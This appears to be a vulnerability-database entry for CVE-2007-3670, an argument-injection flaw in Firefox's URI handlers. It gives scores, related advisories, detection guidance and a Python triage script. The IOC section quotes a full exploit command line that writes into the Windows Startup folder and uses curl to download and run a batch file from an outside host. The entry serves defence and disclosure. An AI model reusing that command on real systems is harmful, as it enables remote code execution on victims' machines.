CVE-2007-3670
Published 2007-07-10
Priority P426 · medium · 4.3 (CVSS 2.0)
Vector: AV:N/AC:M/Au:N/C:N/I:P/A:N
EXPLOIT
EPSS: 29.35% (97.9th percentile)
Argument injection vulnerability in Microsoft Internet Explorer, when running on systems with Firefox installed and certain URIs registered, allows remote attackers to conduct cross-browser scripting attacks and execute arbitrary commands via shell metacharacters in a (1) FirefoxURL or (2) FirefoxHTML URI, which are inserted into the command line that is created when invoking firefox.exe. NOTE: it has been debated as to whether the issue is in Internet Explorer or Firefox. As of 20070711, it is CVE's opinion that IE appears to be failing to properly delimit the URL argument when invoking Firefox, and this issue could arise with other protocol handlers in IE as well. However, Mozilla has stated that it will address the issue with a "defense in depth" fix that will "prevent IE from sending Firefox malicious data."
Affected
10 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| apple | quicktime | <= 7.1.5 | — |
| microsoft | internet_explorer | — | — |
| microsoft | internet_explorer | — | — |
| microsoft | internet_explorer | — | — |
| mozilla | firefox | <= 2.0.0.4 | — |
| mozilla | firefox | <= 2.0.0.6 | — |
| mozilla | firefox | — | — |
| mozilla | firefox | — | — |
| mozilla | thunderbird | — | — |
| netscape | navigator | — | — |
Detection & IOCs (extracted from sources)
command: FirefoxURL-308046B0AF4A39CB:" -P -MOZ_LOG=raw,Widget:4 -MOZ_LOG_FILE="C:/Users/IEUser/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup/&cd ..&cd ..&cd Users&cd Public&curl -o z.bat poc.mm2.in&z.bat
- Monitor for process launches of firefox.exe or navigator.exe with suspicious arguments including '-chrome', '-MOZ_LOG', or '-MOZ_LOG_FILE' passed via URI handler invocation (firefoxurl: or navigatorurl: schemes).
- Detect use of the '-chrome' argument passed to Firefox or Navigator via URI handler, which enables JavaScript execution in privileged Chrome context.
- Alert on command lines containing '-MOZ_LOG' or '-MOZ_LOG_FILE' arguments passed to Firefox, especially when combined with shell metacharacters (& ; |) or paths pointing to Startup folders.
- Detect spaces and double-quote characters in URIs passed to external program handlers (mailto:, firefoxurl:, navigatorurl:), which are the injection vector for argument smuggling.
- Monitor for files written to the Windows Startup folder (e.g. %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\) by Firefox or child processes spawned from Firefox.
- Detect cmd.exe being instantiated via Mozilla XPCOM interfaces (nsILocalFile / nsIProcess) from within a browser JavaScript context, as used in the navigatorurl PoC exploit.
- The -osint flag was introduced as a fix for CVE-2007-3670 in nsAppRunner.cpp, but the -MOZ_LOG and -MOZ_LOG_FILE arguments bypass this check because they are handled in LogCommandLineHandler.cpp without the -osint guard, causing the vulnerability to resurface in later Firefox versions.
- Major browsers (Chrome, Firefox itself) encode special characters in URLs (e.g. " becomes %22) before passing to URI handlers, preventing exploitation. However, Windows applications such as Microsoft Office do not perform this encoding, making them viable attack vectors.
- The exploit payload requires knowledge of the victim's Windows username to construct the correct Startup folder path; in many organizations the username matches the email address prefix, enabling targeted attacks via email delivery.
- Red Hat Enterprise Linux versions of Firefox and Thunderbird are not affected by CVE-2007-3670 or its related variants (CVE-2007-4038, CVE-2007-4039).
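The command-line checks listed above, expressed as triage logic over process-creation command lines. This is an added example, not code from the advisory sources or from Mozilla; the rule names, the `findings` helper and the sample lines are constructed for illustration.

```python
import re

# Rule names and sample command lines are constructed for this example.
BROWSER_IMAGE = re.compile(r'(?i)\b(firefox|navigator)\.exe\b')
RISKY_ARG = re.compile(r'(?i)(?:^|[\s"])-(chrome|moz_log_file|moz_log)(?=[\s="]|$)')
OSINT = re.compile(r'(?i)(?:^|\s)-osint(?=\s|$)')
SHELL_META = re.compile(r'[&;|]')
STARTUP_DIR = re.compile(r'(?i)[\\/]start menu[\\/]programs[\\/]startup[\\/]')


def split_image(cmdline):
    """Split a Windows command line into (image path, remaining arguments)."""
    cmdline = cmdline.strip()
    if cmdline.startswith('"'):
        end = cmdline.find('"', 1)
        if end == -1:                      # unterminated quote: treat all as image
            return cmdline[1:], ''
        return cmdline[1:end], cmdline[end + 1:]
    image, _, rest = cmdline.partition(' ')
    return image, rest


def findings(cmdline):
    """Return the rule names that fire for one process-creation command line."""
    image, args = split_image(cmdline)
    if not BROWSER_IMAGE.search(image):
        return []
    risky = sorted({m.group(1).lower() for m in RISKY_ARG.finditer(args)})
    if not risky:
        # '&' and ';' are normal inside URLs, so they only count next to a risky argument.
        return []
    hits = ['arg:-' + name for name in risky]
    if OSINT.search(args):
        hits.append('risky-arg-despite-osint')   # launched by an OS URI handler
    if SHELL_META.search(args):
        hits.append('shell-metacharacter')
    if STARTUP_DIR.search(args):
        hits.append('startup-folder-path')
    return hits


SAMPLES = [  # constructed, with placeholder values
    r'"C:\Program Files\Mozilla Firefox\firefox.exe" -osint -url "https://example.org/?q=a&lang=en"',
    r'"C:\Program Files\Netscape\Navigator\navigator.exe" -url "navigatorurl:placeholder" -chrome "placeholder"',
    r'"C:\Program Files\Mozilla Firefox\firefox.exe" -osint -url "firefoxurl-placeholder:" -P '
    r'-MOZ_LOG=raw,Widget:4 -MOZ_LOG_FILE="C:/Users/example/AppData/Roaming/Microsoft/Windows/'
    r'Start Menu/Programs/Startup/&echo placeholder"',
]

if __name__ == '__main__':
    for line in SAMPLES:
        print(findings(line) or ['clean'], '<-', line[:60])
```

The first sample stays clean even though its URL contains `&`, which is why the metacharacter rule is gated on a risky argument being present.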
CVSS provenance
nvd · v2.0 · 4.3 MEDIUM · AV:N/AC:M/Au:N/C:N/I:P/A:N
vendor_redhat · 5.0 MEDIUM
vendor_ubuntu · 4.3 MEDIUM
GHSA
GHSA-qwp7-hh47-5g3h · ghsa_unreviewed · 2022-05-03 · CVE-2007-3670 [MEDIUM] CWE-79
Argument injection vulnerability in Microsoft Internet Explorer, when running on systems with Firefox installed and certain URIs registered, allows remote attackers to conduct cross-browser scripting attacks and execute arbitrary commands via shell metacharacters in a (1) FirefoxURL or (2) FirefoxHTML URI, which are inserted into the command line that is created when invoking firefox.exe. NOTE: it has been debated as to whether the issue is in Internet Explorer or Firefox. As of 20070711, it is CVE's opinion that IE appears to be failing to properly delimit the URL argument when invoking Firefox, and this issue could arise with other protocol handlers in IE as well. However, Mozilla has stated that it will address the issue with a "defense in depth" fix that will "prevent IE from sending F
GHSA
GHSA-5qrv-2vjc-xwcq · ghsa_unreviewed · 2022-05-01 · CVSS 4.3 · CVE-2007-4039 [MEDIUM] CWE-79
Argument injection vulnerability involving Mozilla, when certain URIs are registered, allows remote attackers to conduct cross-browser scripting attacks and execute arbitrary commands via shell metacharacters in an unspecified URI, which are inserted into the command line when invoking the handling process, a similar issue to CVE-2007-3670.
GHSA
GHSA-mx2j-qfcf-xcrp · ghsa_unreviewed · 2022-05-01 · CVSS 4.3 · CVE-2007-3924 [MEDIUM]
Argument injection vulnerability in Microsoft Internet Explorer, when running on systems with Netscape installed and certain URIs registered, allows remote attackers to conduct cross-browser scripting attacks and execute arbitrary commands via shell metacharacters in a -chrome argument to the navigatorurl URI, which are inserted into the command line that is created when invoking netscape.exe, a related issue to CVE-2007-3670. NOTE: there has been debate about whether the issue is in Internet Explorer or Netscape. As of 20070713, it is CVE's opinion that IE appears to not properly delimit the URL argument when invoking Netscape; this issue could arise with other protocol handlers in IE.
GHSA
GHSA-5457-v8jm-4679 · ghsa_unreviewed · 2022-05-01 · CVSS 4.3 · CVE-2007-4042 [MEDIUM]
Multiple argument injection vulnerabilities in Netscape Navigator 9 allow remote attackers to execute arbitrary commands via a NULL byte (%00) and shell metacharacters in a (1) mailto, (2) nntp, (3) news, (4) snews, or (5) telnet URI, a similar issue to CVE-2007-3670.
GHSA
GHSA-2mgm-7frw-wmjm · ghsa_unreviewed · 2022-05-01 · CVSS 4.3 · CVE-2007-4040 [MEDIUM] CWE-79
Argument injection vulnerability involving Microsoft Outlook and Outlook Express, when certain URIs are registered, allows remote attackers to conduct cross-browser scripting attacks and execute arbitrary commands via shell metacharacters in an unspecified URI, which are inserted into the command line when invoking the handling process, a similar issue to CVE-2007-3670.
GHSA
GHSA-3r6g-vgfw-328v · ghsa_unreviewed · 2022-05-01 · CVSS 4.3 · CVE-2007-4038 [MEDIUM] CWE-94
Argument injection vulnerability in Mozilla Firefox before 2.0.0.5, when running on systems with Thunderbird 1.5 installed and certain URIs registered, allows remote attackers to conduct cross-browser scripting attacks and execute arbitrary commands via shell metacharacters in a mailto URI, which are inserted into the command line that is created when invoking Thunderbird.exe, a similar issue to CVE-2007-3670.
GHSA
GHSA-6x5g-m8wv-w9v6 · ghsa_unreviewed · 2022-05-01 · CVSS 5.0 · CVE-2007-5045 [MEDIUM] CWE-94
Argument injection vulnerability in Apple QuickTime 7.1.5 and earlier, when running on systems with Mozilla Firefox before 2.0.0.7 installed, allows remote attackers to execute arbitrary commands via a QuickTime Media Link (QTL) file with an embed XML element and a qtnext parameter containing the Firefox "-chrome" argument. NOTE: this is a related issue to CVE-2006-4965 and the result of an incomplete fix for CVE-2007-3670.
GHSA
GHSA-9cfh-j5rr-38cm · ghsa_unreviewed · 2022-05-01 · CVSS 4.3 · CVE-2007-3954 [MEDIUM] CWE-79
Argument injection vulnerability in Microsoft Internet Explorer, when running on systems with SeaMonkey installed and certain URIs registered, allows remote attackers to conduct cross-browser scripting attacks and execute arbitrary commands via shell metacharacters in a mailto URI, which are inserted into the command line that is created when invoking SeaMonkey.exe, a related issue to CVE-2007-3670.
GHSA
GHSA-7mf2-w637-f57x · ghsa_unreviewed · 2022-05-01 · CVSS 4.3 · CVE-2007-4041 [MEDIUM] CWE-78
Multiple argument injection vulnerabilities in Mozilla Firefox 2.0.0.5 and 3.0alpha allow remote attackers to execute arbitrary commands via a NULL byte (%00) and shell metacharacters in a (1) mailto, (2) nntp, (3) news, (4) snews, or (5) telnet URI, a similar issue to CVE-2007-3670.
Ubuntu
Thunderbird vulnerabilities
vendor_ubuntu · 2007-08-25 · CVSS 4.3 · CVE-2007-3845 [MEDIUM]
Various flaws were discovered in the layout and JavaScript engines. By tricking a user into opening a malicious email, an attacker could execute arbitrary code with the user's privileges. Please note that JavaScript is disabled by default for emails, and it is not recommended to enable it. (CVE-2007-3734, CVE-2007-3735, CVE-2007-3844)
Jesper Johansson discovered that spaces and double-quotes were not correctly handled when launching external programs. In rare configurations, after tricking a user into opening a malicious email, an attacker could execute helpers with arbitrary arguments with the user's privileges. (CVE-2007-3670, CVE-2007-3845)
Instructions: After a standard system upgrade you need to restart Thunde
Red Hat
CVE-2007-5045 [MEDIUM] · vendor_redhat · CVSS 5.0
Argument injection vulnerability in Apple QuickTime 7.1.5 and earlier, when running on systems with Mozilla Firefox before 2.0.0.7 installed, allows remote attackers to execute arbitrary commands via a QuickTime Media Link (QTL) file with an embed XML element and a qtnext parameter containing the Firefox "-chrome" argument. NOTE: this is a related issue to CVE-2006-4965 and the result of an incomplete fix for CVE-2007-3670.
Statement: Not vulnerable. These issues did not affect the versions of Firefox as shipped with Red Hat Enterprise Linux.
Red Hat
CVE-2007-4039 [MEDIUM] · vendor_redhat · CVSS 4.3
Argument injection vulnerability involving Mozilla, when certain URIs are registered, allows remote attackers to conduct cross-browser scripting attacks and execute arbitrary commands via shell metacharacters in an unspecified URI, which are inserted into the command line when invoking the handling process, a similar issue to CVE-2007-3670.
Statement: Not vulnerable. This issue does not affect the versions of Firefox or Thunderbird as shipped with Red Hat Enterprise Linux.
Red Hat
CVE-2007-4038 [MEDIUM] · vendor_redhat · CVSS 4.3
Argument injection vulnerability in Mozilla Firefox before 2.0.0.5, when running on systems with Thunderbird 1.5 installed and certain URIs registered, allows remote attackers to conduct cross-browser scripting attacks and execute arbitrary commands via shell metacharacters in a mailto URI, which are inserted into the command line that is created when invoking Thunderbird.exe, a similar issue to CVE-2007-3670.
Statement: Not vulnerable. This issue does not affect the versions of Firefox or Thunderbird as shipped with Red Hat Enterprise Linux.
No detection rules found.
Published 2007-07-10